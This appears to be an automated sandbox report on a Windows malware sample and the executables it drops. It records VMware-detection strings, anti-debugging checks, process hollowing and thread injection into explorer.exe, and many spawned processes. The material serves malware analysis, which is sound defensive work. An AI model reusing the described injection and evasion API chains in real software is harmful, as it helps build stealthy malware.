                      Source: 5A89.exe, 00000008.00000003.3814729110.00000000030CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCQ+Mgq8T7UeC/2woYMrFlxjDMFr68VrX2WjJ7YjnLbHGfSDEn0XiQNjKrjsFj8m
                      Source: 5A89.exe, 00000008.00000002.3839479771.00000000009A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: explorer.exe, 00000002.00000000.1411753335.00000000030F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001G
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008B3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: 5A89.exe, 00000008.00000003.3760473947.00000000030C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: an6zYaGMDELrubWA6FhgFsrtk9CuIiIJYZhvenKIZdE2mgMRErUH3EbfjlSKpYro
                      Source: 5A89.exe, 00000008.00000003.3039427133.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3030931859.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2991826783.00000000038E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JL5vq8OT/r5zKqY6BnOih8n6RHV3ZfJwJfjM-egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs-eg+LEmXl8ieWU+336DqP/G0/8aJ4zS7lkTqqfuwJ7og-eh/165pCOo9Rhqna/NPgoXgzqj1FPwZFmVPBdWaJg+w-eiIMxS+q4kA6Oszx1FETHeYsU3hJ/nAGraIv1XaU93U-eiheONssC27rafOVP++3DRnD3+wmX9BkYaLyoIqplDQ-ei6v5MMmuEx0YBS+/J+jG6V+KKsPjGmn+X5x+fQfzdU-ei9NmNSqE18cJ4zpx/8UwnnWMmvdqxAzfTVXNB/oXJs-ejJvlKMDa64hrz37oWYT/gY9Q06vQWbcI9GVWPmlwhQ-ejLh9VI0ksR79ltiChqc6n/oNUkV1+RDRs+jr4gMku0-ekNbNuxpg4pAhaL2iol5RigFAMzRMm27+lXwLSZ8fS0-ekfJ8qAfi0FYR4Jy7SIQBTqFizuOVgzpLIIDwaPPbiU-ekjdD17WnDCjU9PDpOl5lcDG0BwAhYsIbXGrIdCnOz0-elNHbGyW92ZstgLGATu0mHA3SSbISDtdtkpFtRhjxEQ-emraI0H5XJqmiAQ6lD4p4rTufnIAsfMSLazx7QuoTyg-ensT1UE3wz/HlezwbWGtMWa9OZf6aBzrndB8LoZ4cVA-eoIxWUkdpDh34fE24Fv65/tHKVLCzfag642xN8IllOU-eoOGhT9aVFRI247Ejw83FZf7GX2NsALrHN3pfR8Zba8-eoYhAd1Izs8/Mq/KRJst1hqNRbhdig4Hfh4Xiop8vxo-eo5PoeVaxkx97uTuBempEP7+uCHa4EoTsiI11dzK6lE-epTTn/6KHUYLECHzT4y7FA2juD9oLGYeacjUB35OU6g-epTxdIKr3fCTYCUyTXPQR/U5AzjKQohjifv4QFESylw-eqFnMHheHumUaOZ5/tJTZb0+DDfOC5/rd0pDKNQHd58-eqvZCbB1ZTcQyXOSBfCjTy7E2MYz2xAjVNLO/dGK+os-erBWDQZczqfm0HxNYvnPQtH3LwKVs0F+oP1G9qJ1jrE-erovMFWX+/u4JsrSpcXJb+Q0DdmqJpHmOdusN5GnY7A-eru21/QrtGoXe16ofT2RDGg1mQ+vYl6J4T2fvMPc1Us-eru6dA/tRLLS/zjwULnVGn0QPbRK+dwYQa/vor9jQAc-eshBQCcBl8aWg1FXGs2G3qduoR0Sd18Phu2S3LeN93c-eswIJDJzP95T1os79KuG40FcM3fVkSNIbNKj4ON2Vo8-etaVDqjXcRAUPdZ0iq1RSrN91fMaWvXekWtW5WaPfpU-etsrVCOBbnFnW4xNBWulwyhMftp33UtPx4qogYffOPc-euLo8hQxOGnYXxBLwBCLYra25Xu+qUoFb0LRPkSpuT4-evDzh83iZQOGwhThpcGKEPSZmyP6frEKTMFZ9apc634-evLuTQzTLqFK7M5+SuQ5yl7t1q/w44Jf1ItEjtDmGyo-ev3nFqwnuo9IU5OFG44orT5hbzlCf7OWLn2wBnNC8tg-ewyI6Lej9rYYIBZ4idnQ+WstBe5Rm9Z8XMa0TR57r3o-ezUNfgjMc7FKnykM7ACEZfUqTlFu6Q11YurigiTxDeA-ezgda5H9moseim738Ag96i9WAZhZJmZ38+qNxa8k3B0-ez+oi00DYMB7+cVXh4fuork1b7Sy0QlgoJk6XgiU/AM-e0rdYYXwlP79lnKahz0VNAT0W4/55MTNlxRP3DOs9ug-e1gSpno6KmV6x2PZKS7qKrdDWq8DO3RS7TIEUcqixpI-e1tnHkrve/ex6423Gj3ifjmPJAeU19bbWwHE+i04XsE-e162F938bxWKKyCYK91G8byPqOqGTyji6LBQFDRT2zc-e22kuU/RfDacLE+l/KpyVGGEoHLZyLBIpjquN237lT0-e31u7SMky76ygmxEdWNk3HKxXIe1MBVjBqJqcWbMINw-e35/gDdiLRBRq31STbKcaMSKEnZ/LSNZPszXJiJMNqI-e4S8yi3qv3XuBn9t7ylX9JURiMC+r4VGcP0lO+AziXU-e4lVeMdc+CDfWP9aiVzXesicc9cJh93y1hTHHgvoJE8-e41BLZM1I3EgKaVT/OsuJERvNynwmTSfueq9IFb7jpQ-e5fo3c8VekzioPQKgD7vmnPUnDw4mwb3nAIvtv57sac-e5vDZKUWW2rugfRJEbCQx/zHAnfHAHsTqOw7NyrETwk-e6xM+zKnDwa/LtcntndALfB059oFwmv14L6gHnz/WRo-e6xjm5GgYDUS12PmlN8nzBMqpJzVvXMSZEQ3vlZ/2SU-e7QmqCiQghaccS0dAmUTIi7xqHpkFpGm+r1Y0bAKvHo-e7zIKEIU6THMGFZUWnZ3GzgZqvJDpi+qlHo2iiHcmgM-e8KgVMp1MLu5JYLOOlmJPLPnFlPb+xHm4BxVyMRx3g0-e81DiL1CfSZFrsb5ttv9jvDnwdhfC2h7qQqbLw9oqso-e8/UpPXnvMMFV4i3u/DtDiVwoiltkL3/bhApG80zHig-e+ahS69dNNL+OMZfTrOWOlYSPk75s7J4odyOxicarbs-e+ko3ra6wpp9qkplg8J5GNxRF4UtxiIB0EDm5g5tXy0-e/tvZBkYAJGf2lnFlbtJjq1OiDc9TxvWO4yBUJD3PIM-fA0brBRDWMycEsC36RU43T3w7qpfpjdSgnAH45IOJ8A-fBDwqJaaE06Q7A6gzdDGAGW3tUVxUkpXR4/iEwNpvnM-fB7eo59mpkT8dehLT7HG92tXS0OdubBbleYOsDN8QBA-fB8V5fgDuQOuiv0x0G7Xe35ShykDwJJezOY0lrUF0Mc-fCXABMNA2yf0nn7G4lQMHhJ+du1vXSPCzh/I2Ku3F3o-fCj9FbMUOiNzz/Db1SiN3zEshPd7uea+y/x+0mk3oy4-fCs2tW0jeG7fqAo
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008B78000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: 5A89.exe, 00000008.00000003.3742673237.00000000030CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBANISBQMG9FQEmUYbqSHKCMVy6pp7Lg62kDV5bh2nFFvTob4Cf4Z3gvXv
                      Source: 5A89.exe, 00000008.00000002.3839845573.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3062129343.0000000000ADB000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2949296216.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2937827235.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3026058389.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2943044860.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3036832743.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2967060358.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3067963331.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >7:qEmu|Z
                      Source: explorer.exe, 00000002.00000000.1411204311.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000"
                      Source: 5A89.exe, 00000008.00000003.3742673237.00000000030CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Fi/NaU/VvYUxcVTz4vaYs2NRFcShZgtsVKBQ39+vmcICB7VZbxFYSGTVNsAYOU0j
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008A47000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
                      Source: explorer.exe, 00000002.00000000.1411753335.00000000030F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008C9E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000y@
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008B3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTroVMWare
                      Source: explorer.exe, 00000002.00000000.1411204311.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000R
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008D2F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}-
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008D2F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000002.00000000.1411753335.00000000031BA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeAPI call chain: ExitProcess graph end nodegraph_16-6731
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,10_2_00409543
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00401114
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_004205D0 LoadLibraryW,GetProcAddress,VirtualProtect,0_2_004205D0
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_001F092B mov eax, dword ptr fs:[00000030h]0_2_001F092B
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_001F0D90 mov eax, dword ptr fs:[00000030h]0_2_001F0D90
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00551E6E push dword ptr fs:[00000030h]0_2_00551E6E
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_001F092B mov eax, dword ptr fs:[00000030h]6_2_001F092B
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_001F0D90 mov eax, dword ptr fs:[00000030h]6_2_001F0D90
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_007B003E push dword ptr fs:[00000030h]6_2_007B003E
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_026250A3 push dword ptr fs:[00000030h]7_2_026250A3
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_027E0042 push dword ptr fs:[00000030h]7_2_027E0042
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 10_2_0040AEA4 mov eax, dword ptr fs:[00000030h]10_2_0040AEA4
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 10_2_00407D21 mov eax, dword ptr fs:[00000030h]10_2_00407D21
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 17_2_00407D21 mov eax, dword ptr fs:[00000030h]17_2_00407D21
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 17_2_0040AEA4 mov eax, dword ptr fs:[00000030h]17_2_0040AEA4
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00421060 GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,SetDefaultCommConfigW,FreeEnvironmentStringsA,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoW,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryW,MoveFileExW,OpenWaitableTimerW,CompareStringW,GetProcessHeaps,GetProcessWorkingSetSize,0_2_00421060
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00401114
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_00403309 SetUnhandledExceptionFilter,7_2_00403309
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_00402F85 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00402F85
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 8_2_006943E0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_006943E0
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 8_2_00694A78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00694A78
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Benign windows process drops PE files
                      Source: C:\Windows\explorer.exeFile created: EE8C.exe.2.drJump to dropped file
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_027E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,7_2_027E0110
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeThread created: C:\Windows\explorer.exe EIP: 2E41A88Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtThread created: unknown EIP: 8011A88Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeThread created: unknown EIP: 8EA19F0
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeMemory written: C:\Users\user\AppData\Local\Temp\5A89.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\ProgramData\Drivers\csrss.exeMemory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00477F98 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,18_2_00477F98
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeProcess created: C:\Users\user\AppData\Local\Temp\5A89.exe C:\Users\user\AppData\Local\Temp\5A89.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7620 -ip 7620
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 640
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2000 -ip 2000
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 356
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: unknown unknown
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 10_2_004082B6 CheckTokenMembership,AllocateAndInitializeSid,FreeSid,10_2_004082B6
                      Source: explorer.exe, 00000002.00000000.1411397816.0000000001311000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000002.00000000.1411397816.0000000001311000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1412488179.0000000004700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1415007841.0000000008C36000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000002.00000000.1411397816.0000000001311000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000002.00000000.1411397816.0000000001311000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000002.00000000.1411204311.0000000000DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanDI3
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,SetDefaultCommConfigW,FreeEnvironmentStringsA,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoW,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryW,MoveFileExW,OpenWaitableTimerW,CompareStringW,GetProcessHeaps,GetProcessWorkingSetSize,0_2_00421060
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,SetDefaultCommConfigW,FreeEnvironmentStringsA,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoW,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryW,MoveFileExW,OpenWaitableTimerW,CompareStringW,GetProcessHeaps,GetProcessWorkingSetSize,6_2_00421060
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_0040DC53
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_0040E079
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_0040E012
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_0040DCFA
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_0040E0B5
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_0040DD55
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: GetLocaleInfoA,7_2_00411109
